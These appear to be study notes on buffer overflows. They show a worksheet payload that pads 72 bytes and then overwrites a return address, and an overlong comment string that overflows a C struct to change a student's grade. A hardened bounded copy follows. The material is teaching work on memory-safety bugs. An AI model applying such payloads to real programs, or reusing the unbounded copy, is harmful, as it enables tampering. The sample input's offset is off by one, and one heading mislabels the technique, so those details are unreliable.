Buffer Overflow Attack

<aside> 💡 When carrying out a buffer overflow attack, especially one driven by input, the first step is to work out how much padding is needed before the saved return address. If we are given the assembly, look for the operations that set up the stack frame; they tell us how many bytes sit between the start of the buffer and the return address:

  1. push / pop → 8 bytes of padding each
  2. sub (on the stack pointer) → convert the hex immediate to bytes

Once you have the amount of padding, add that padding to the input and follow it with the address of the malicious function you want to call, written in little endian.

</aside>

Example: Discussion Worksheet

  1. We have a push operation and then a sub operation.
    1. Push = 8 bytes and sub = 64 bytes, so we need 72 bytes of padding.
  2. Write the address of the malicious function in little endian: 0x500142 becomes 42 01 50, padded out with zero bytes to a full 8-byte address.
**Answer**
PP AA DD DD II NN GG 01
PP AA DD DD II NN GG 02
PP AA DD DD II NN GG 03
PP AA DD DD II NN GG 04
PP AA DD DD II NN GG 05
PP AA DD DD II NN GG 06
PP AA DD DD II NN GG 07
PP AA DD DD II NN GG 08
PP AA DD DD II NN GG 09 // 72 bytes of padding
42 01 50 00 00 00 00 00 // 0x500142 in little endian, padded to 8 bytes

Return Oriented Attacks

typedef struct student {
  char username[50];
  char comment[16];
  int final_grade; // 100==A+, 0==F-
} student_t;

student_t users[250];  // well, we had a few drops... only the strong survive!

// Copies src into dest until the null terminator. There is no bounds check:
// nothing stops src from being longer than dest, so a long comment runs past
// comment[16] into the struct padding and then into final_grade.
void string_copy(char* dest, char* src) {
  int i = 0;
  while(src[i] != 0) { // keep going till we get to the end of the string
    dest[i]=src[i];
    i++;
  }
  dest[i]=0; // don't forget the null character!
}

// id is never range-checked against the 250-entry users array either.
int set_class_comment(int id, char* comment_from_file) {
  string_copy(users[id].comment, comment_from_file);
  return 0; // declared int, so return a status
}

// 50 bytes for username are untouched: the copy starts at comment
// 16 bytes for comment + 2 bytes of struct padding before final_grade
// then the byte 100 (an A+), which is 'd' in ASCII
AnocanaryAAAAAAAAAAd
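Added example (not the worksheet's or the course's code) showing where the 2 bytes of padding come from and what the fix to string_copy looks like: it computes the comment-to-final_grade distance with offsetof and replaces the unchecked copy with one that takes the destination size and rejects the overlong comment above. NUM_USERS, string_copy_bounded, set_class_comment_safe and grade_of are names chosen for this example; the offsets assume the usual 4-byte int alignment.

```c
#include <stddef.h>
#include <string.h>

/* Same layout as the worksheet struct. */
typedef struct student {
  char username[50];
  char comment[16];
  int final_grade; /* 100==A+, 0==F- */
} student_t;

#define NUM_USERS 250 /* assumed array size, matching users[250] above */
static student_t users[NUM_USERS];

/* Bytes from the start of comment to final_grade: the 16-byte comment plus
 * the padding the compiler inserts so the int is 4-byte aligned. With the
 * usual ABI offsets (comment at 50, final_grade at 68) this is 18. */
size_t comment_to_grade_distance(void) {
  return offsetof(student_t, final_grade) - offsetof(student_t, comment);
}

/* Hardened copy: destination size is explicit and the source length is
 * measured (without reading past dest_size) before any byte is written.
 * Returns 0 on success, -1 if src plus its terminator does not fit. */
int string_copy_bounded(char *dest, size_t dest_size, const char *src) {
  size_t len = 0;
  while (len < dest_size && src[len] != 0) {
    len++;
  }
  if (len >= dest_size) {
    return -1; /* refuse rather than silently truncate or overflow */
  }
  memcpy(dest, src, len);
  dest[len] = 0; /* terminator now guaranteed to land inside dest */
  return 0;
}

/* Hardened set_class_comment: also validates id, since an out-of-range
 * index would write into memory outside the users array. */
int set_class_comment_safe(int id, const char *comment_from_file) {
  if (id < 0 || id >= NUM_USERS) {
    return -1;
  }
  return string_copy_bounded(users[id].comment, sizeof users[id].comment,
                             comment_from_file);
}

/* Read back a grade so a caller can confirm an overlong comment was rejected
 * before it reached final_grade. */
int grade_of(int id) { return users[id].final_grade; }
```

With the worksheet's 20-character input the safe version returns -1 and final_grade is left at its previous value; a comment of at most 15 characters is copied normally.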